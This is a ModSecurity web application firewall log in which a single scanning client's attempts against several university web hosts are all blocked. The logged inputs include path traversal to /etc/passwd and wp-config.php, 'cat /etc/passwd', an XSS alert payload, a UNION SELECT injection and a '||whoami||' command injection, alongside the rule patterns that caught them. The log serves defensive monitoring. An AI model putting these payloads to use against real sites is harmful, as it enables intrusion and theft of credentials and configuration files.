[Tue Aug 29 11:42:04.396754 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdb7hAAAAAb"]
[Tue Aug 29 11:42:05.419696 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdXIkgAAAAd"]
[Tue Aug 29 11:42:05.420618 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdOeO4AAAAS"]
[Tue Aug 29 11:42:05.424216 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdV7YwAAAAa"]
[Tue Aug 29 11:42:05.430170 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdQ3eAAAAAV"]
[Tue Aug 29 11:42:05.431031 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HcCo-f0AAAc36y0AAAAO"]
[Tue Aug 29 11:42:05.441833 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAc-5y0AAAAN"]
[Tue Aug 29 11:42:06.374477 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HsCo-f0AAAQSWx4AAAA0"]
[Tue Aug 29 11:42:06.422962 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdb7hUAAAAb"]
[Tue Aug 29 11:42:06.475535 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdPLxcAAAAT"]
[Tue Aug 29 11:42:06.476204 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdaZNEAAAAM"]
[Tue Aug 29 11:42:06.479791 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdKXMoAAAAK"]
[Tue Aug 29 11:42:06.479818 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdTA@gAAAAY"]
[Tue Aug 29 11:42:07.413511 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdTA@kAAAAY"]
[Tue Aug 29 11:42:07.427438 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdcs8IAAAAC"]
[Tue Aug 29 11:42:07.444911 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAcuUncAAAAI"]
[Tue Aug 29 11:42:07.483407 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAc36y8AAAAO"]
[Tue Aug 29 11:42:07.549148 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAc-5zEAAAAN"]
[Tue Aug 29 11:42:07.580972 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13H8Co-f0AAAbo-aQAAAAi"]
[Tue Aug 29 11:42:07.672365 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAcuUngAAAAI"]
[Tue Aug 29 11:42:07.673188 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAc36zEAAAAO"]
[Tue Aug 29 11:42:07.707596 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdUcy8AAAAZ"]
[Tue Aug 29 11:42:07.707775 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdYA-8AAAAe"]
[Tue Aug 29 11:42:08.354661 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAdQ3eYAAAAV"]
[Tue Aug 29 11:42:08.364483 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdV7ZEAAAAa"]
[Tue Aug 29 11:42:08.366811 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAcoNg0AAAAF"]
[Tue Aug 29 11:42:08.366884 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdPLxoAAAAT"]
[Tue Aug 29 11:42:08.368115 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAdYBAAAAAAe"]
